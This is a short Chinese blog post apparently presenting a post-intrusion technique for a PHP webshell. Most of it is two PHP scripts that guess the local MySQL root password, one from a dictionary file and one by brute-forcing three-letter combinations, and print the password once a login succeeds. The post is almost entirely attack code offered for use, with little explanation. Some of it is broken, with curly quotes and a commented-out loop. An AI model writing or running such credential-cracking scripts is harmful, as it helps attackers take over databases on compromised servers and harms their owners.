webshell另类提权新姿势-php本地猜解MYSQL

代码笔记
php本地猜解MYSQL-字典文件猜解

<?set_time_limit(0); //脚本不超时$user=”root”; //用户名//$passwd=file(“password.txt”); //密码字典//for($i=0;$i<count($passwd);$i++){//$pass=$passwd[$i];connect($user,$pass);flush();//}echo “扫描结束！”;function connect($user,$pass) {$conn=@mysql_connect(“localhost”,$user,$pass);if($conn){echo “<font color=’#0000FF’><b>得到密码：<font color=’#FF0000′>”.$pass.”</font>！！！</b></font>”;exit();}else {echo $pass.’‘;}}?>

php本地猜解MYSQL-暴力猜解

<textarea rows=25 cols=90 id=’t1′><?phpset_time_limit(0);$fruit=array(‘a’,’b’,’c’,’d’,’e’,’f’,’g’,’h’,’i’,’j’,’k’,’l’,’m’,’n’,’o’,’p’,’q’,’r‘,’s’,’t’,’u’,’v’,’w’,’x’,’y’,’z’); //密码组合单个字符$mmcd=3;  //密码长度$jlcs1=0;$dishes[]=range(1,$mmcd);//开始循环for($i=0;$i<$mmcd;$i++){foreach($dishes as $k=>$v){foreach($fruit as $_fruit){$v[$i]=$_fruit;$dishes[]=$v;unset($dishes[$k]);$t=implode(”,$v);$user='root';$pass=$t;$conn=@mysql_connect(‘localhost’,$user,$pass);//每生成800个密码自动删除文本框并创建一个文本框$jlcs1=$jlcs1+1;if($jlcs1==800){echo “</textarea>”;echo “<script language=\”JavaScript\”>var v = document.getElementById(‘t1′);v.parentNode.removeChild(v);</script>”;echo “<textarea rows=25 cols=90 id=’t1′>”;$jlcs1=0;}//测试密码if($conn){echo “<script language=\”JavaScript\”>var v = document.getElementById(‘t1′);v.parentNode.removeChild(v);</script>”;echo “</textarea>”;echo “<font color=’#0000FF’><b>得到密码: <fontcolor=’#FF0000′>”.$pass.”</font>! ! ! </b></font>”;exit();}else {echo $pass.’ ‘;}flush();}}//总循环输出echo “</textarea>”;echo “<script language=\”JavaScript\”>var v = document.getElementById(‘t1′);v.parentNode.removeChild(v);</script>”;echo “<textarea rows=25 cols=90 id=’t1′>”;echo ‘扫描’,$i+1,'!';}?>

博客的文章都会发到个人订阅号上，欢迎关注